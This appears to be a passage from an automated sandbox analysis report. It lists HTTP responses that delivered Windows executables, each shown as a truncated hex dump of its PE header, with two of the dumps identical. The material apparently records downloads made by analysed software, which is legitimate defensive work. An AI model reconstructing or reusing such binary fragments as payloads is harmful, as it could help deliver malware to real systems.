                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 12:43:17 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 12:43:59 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:44:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:44:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:44:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:44:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
